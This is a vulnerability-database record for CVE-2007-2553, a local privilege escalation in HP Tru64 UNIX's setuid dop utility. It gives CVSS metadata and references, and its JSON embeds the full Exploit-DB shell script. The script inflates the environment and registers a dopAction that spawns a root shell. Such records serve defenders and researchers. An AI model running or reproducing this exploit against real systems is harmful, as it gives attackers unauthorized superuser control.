Search...

CVE-2007-2553

2007-05-09T17:19:00

ID CVE-2007-2553
Type cve
Reporter cve@mitre.org
Modified 2018-10-16T16:44:00

Description

Unspecified vulnerability in dop in HP Tru64 UNIX 5.1B-4, 5.1B-3, and 5.1A PK6 allows local users to gain privileges via a large amount of data in the environment, as demonstrated by a long environment variable.

JSON Vulners Source

Initial Source

{"id": "CVE-2007-2553", "bulletinFamily": "NVD", "title": "CVE-2007-2553", "description": "Unspecified vulnerability in dop in HP Tru64 UNIX 5.1B-4, 5.1B-3, and 5.1A PK6 allows local users to gain privileges via a large amount of data in the environment, as demonstrated by a long environment variable.", "published": "2007-05-09T17:19:00", "modified": "2018-10-16T16:44:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2553", "reporter": "cve@mitre.org", "references": ["https://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c01036871", "http://secunia.com/advisories/25197", "https://exchange.xforce.ibmcloud.com/vulnerabilities/34175", "http://www.securityfocus.com/archive/1/468103/100/0/threaded", "http://osvdb.org/36203", "http://www.vupen.com/english/advisories/2007/1715", "http://www.securitytracker.com/id?1018021", "http://www.securityfocus.com/bid/23881", "http://www.orkaan.org/tru64/orkaan_-_exp_Tru64-5.X_SSRT071326.html"], "cvelist": ["CVE-2007-2553"], "type": "cve", "lastseen": "2020-10-03T11:45:51", "edition": 3, "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:36203"]}, {"type": "exploitdb", "idList": ["EDB-ID:30017"]}], "modified": "2020-10-03T11:45:51", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-10-03T11:45:51", "rev": 2}, "vulnersScore": 7.4}, "cpe": ["cpe:/o:hp:tru64:5.1a", "cpe:/o:hp:tru64:5.1b3", "cpe:/o:hp:tru64:5.1b4"], "affectedSoftware": [{"cpeName": "hp:tru64", "name": "hp tru64", "operator": "eq", "version": "5.1b3"}, {"cpeName": "hp:tru64", "name": "hp tru64", "operator": "eq", "version": "5.1b4"}, {"cpeName": "hp:tru64", "name": "hp tru64", "operator": "eq", "version": "5.1a"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": true, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:hp:tru64:5.1b4:*:*:*:*:*:*:*", "cpe:2.3:o:hp:tru64:5.1b3:*:*:*:*:*:*:*", "cpe:2.3:o:hp:tru64:5.1a:pk6:*:*:*:*:*:*"], "cwe": ["NVD-CWE-noinfo"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:hp:tru64:5.1b4:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:hp:tru64:5.1a:pk6:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:hp:tru64:5.1b3:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}

{"exploitdb": [{"lastseen": "2016-02-03T11:36:01", "description": "HP Tru64 5.0.1 DOP Command Local Privilege Escalation Vulnerability. CVE-2007-2553. Local exploit for unix platform", "published": "2007-05-08T00:00:00", "type": "exploitdb", "title": "HP Tru64 5.0.1 - DOP Command Local Privilege Escalation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2553"], "modified": "2007-05-08T00:00:00", "id": "EDB-ID:30017", "href": "https://www.exploit-db.com/exploits/30017/", "sourceData": "source: http://www.securityfocus.com/bid/23881/info\r\n\r\nHP Tru64 for UNIX is prone to a local privilege-escalation vulnerability.\r\n\r\nExploiting this issue allows local attackers to execute arbitrary code with superuser privileges.\r\nSuccessful exploits will result in a complete compromise of vulnerable computers. Failed exploit attempts will result in a denial of service. \r\n\r\n---------------------8<---------------------8<---------------------\r\n#!/bin/sh\r\n#\r\n# - Author/Credits:\r\n# Daniele Calore; orkaan <at> orkaan.org\r\n#\r\n# - Description:\r\n# HP Tru64 DOP Local Privilege Escalation Vulnerability\r\n#\r\n# UNIX HP Tru64 5.X '/usr/sbin/dop' Local Vulnerability root escalation.\r\n# HP Security bulletin code identification: HPSBTU02211 SSRT071326\r\n# Bugtraq ID: 23881\r\n#\r\n# - Public Released:\r\n# 2007-05-09\r\n#\r\n# - System Affected:\r\n# Tru64 5.1 (ALL) (Last PatchKit: T64v51B20AS0006-20030210 - PK6 - BL20)\r\n# Tru64 5.1A (ALL) (Last PatchKit: T64V51AB24AS0006-20031031 - PK6 - BL24)\r\n# Tru64 5.1B (ALL) (Last PatchKit: T64V51BB27AS0006-20061208 - PK6 - BL26)\r\n#\r\n# - System NOT Tested:\r\n# Tru64 5.0\r\n#\r\n# - System NOT Affected:\r\n# Tru64 4.0x (dop will allways require root password, also for user root)\r\n#\r\n# - More info:\r\n# http://www.orkaan.org/tru64/orkaan_-_exp_Tru64-5.X_SSRT071326.html\r\n#\r\n\r\n#\r\n#####################\r\n\r\n# Defines:\r\n\r\nPATH=\"/sbin:/usr/sbin/:/bin:/usr/bin\"\r\nDOP=\"/usr/sbin/dop\"\r\n\r\n# Environment size target.\r\n# Change this value if you have problems.\r\nENV_TRG=38629\r\n\r\n# Sleep in seconds.\r\n# Change this value (bigger) if you have problems.\r\nSLEEP=10\r\n\r\n#\r\n#####################\r\n# Credits:\r\n\r\necho \"UNIX HP Tru64 5.X '/usr/sbin/dop' Local Vulnerability root escalation.\"\r\necho \"HP Security bulletin code identification: HPSBTU02211 SSRT071326\"\r\necho \"Bugtraq ID: 23881\"\r\necho \"Author: Daniele Calore; orkaan <at> orkaan.org\"\r\necho \"\"\r\n\r\n#\r\n#####################\r\n# Checks:\r\n\r\n# Check User.\r\nMYUID=`id -u`\r\nif [ ${MYUID} -eq 0 ]; then\r\n echo \"Why execute this if you are allready root?\"\r\n exit 1\r\nfi\r\n\r\n# Check dop binary.\r\ntest -u \"${DOP}\"\r\nif [ $? -ne 0 ]; then\r\n echo \"${DOP} binary is without set-user ID bit... Sorry!\"\r\n exit 1\r\nfi\r\n\r\n# Check exec_disable_arg_limit.\r\nARG_LIMIT=`sysconfig -q proc exec_disable_arg_limit 2>/dev/null | tail -1 |\\\r\n cut -f3 -d\" \"`\r\nif [ \"Z${ARG_LIMIT}\" != \"Z0\" ]; then\r\n echo \"exec_disable_arg_limit is set to ${ARG_LIMIT:-none}... Sorry!\"\r\n exit 1\r\nfi\r\n\r\n#\r\n#####################\r\n# DOPAction Attack:\r\n\r\necho \"Ready:\"\r\n\r\n# Unset Display.\r\necho \"1- Unset DISPLAY.\"\r\nunset DISPLAY\r\n\r\n# Make ENV big enough.\r\necho \"2- Make ENV big enough.\"\r\nENV_SIZE=`env | wc -c | tr -cd '[[:digit:]]'`\r\nENV_SIZE=`expr ${ENV_TRG} - ${ENV_SIZE} - 3`\r\nA=`perl -e \"print 'A' x ${ENV_SIZE}`; export A\r\nENV_SIZE=`env | wc -c | tr -cd '[[:digit:]]'`\r\necho \" Actual ENV size is ${ENV_SIZE}; target is ${ENV_TRG};\"\r\n\r\n# Create dopAction.\r\necho \"3- Create a dopAction 'shell'.\r\n Remember to delete it.\r\n As root do:\r\n /usr/sbin/sysman -cli -delete row -comp doprc -group dopActions -key1\r\n shell\r\n\r\n Remember:\r\n - The script will never end.\r\n - If it does not run change ENV_TRG...\r\n - It is normal to see a message like:\r\n Error occurred trying to update /etc/doprc:\r\n shell already exists in /etc/doprc\r\n (This mean that the BUG is present...)\r\n\r\n You have to wait ${SLEEP} seconds.\r\n After this amount of time you will see a: '#' (the root shell prompt).\r\n\"\r\n\r\n# Fork it in Background.\r\ndop /usr/sbin/sysman -cli -add row -comp doprc -group dopActions \\\r\n-data \"shell SuperUsers {{/bin/sh *}}\" &\r\n\r\n# Run the new dopAction.\r\n# Sleep some seconds (maybe you have to change this value).\r\nsleep ${SLEEP}\r\necho \"\"\r\ndop shell\r\n\r\nexit 0\r\n# EOF\r\n---------------------8<---------------------8<---------------------\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/30017/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2007-2553"], "description": "# No description provided by the source\n\n## References:\nVendor Specific Solution URL: https://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c01036871\n[Vendor Specific Advisory URL](http://archives.neohapsis.com/archives/bugtraq/2007-05/0106.html)\nSecurity Tracker: 1018021\n[Secunia Advisory ID:25197](https://secuniaresearch.flexerasoftware.com/advisories/25197/)\nOther Advisory URL: http://www.orkaan.org/tru64/orkaan_-_exp_Tru64-5.X_SSRT071326.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0123.html\nKeyword: HPSBTU02211,SSRT071326\nFrSIRT Advisory: ADV-2007-1715\n[CVE-2007-2553](https://vulners.com/cve/CVE-2007-2553)\nBugtraq ID: 23881\n", "edition": 1, "modified": "2007-05-01T05:18:24", "published": "2007-05-01T05:18:24", "href": "https://vulners.com/osvdb/OSVDB:36203", "id": "OSVDB:36203", "title": "HP Tru64 UNIX dop Unspecified Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}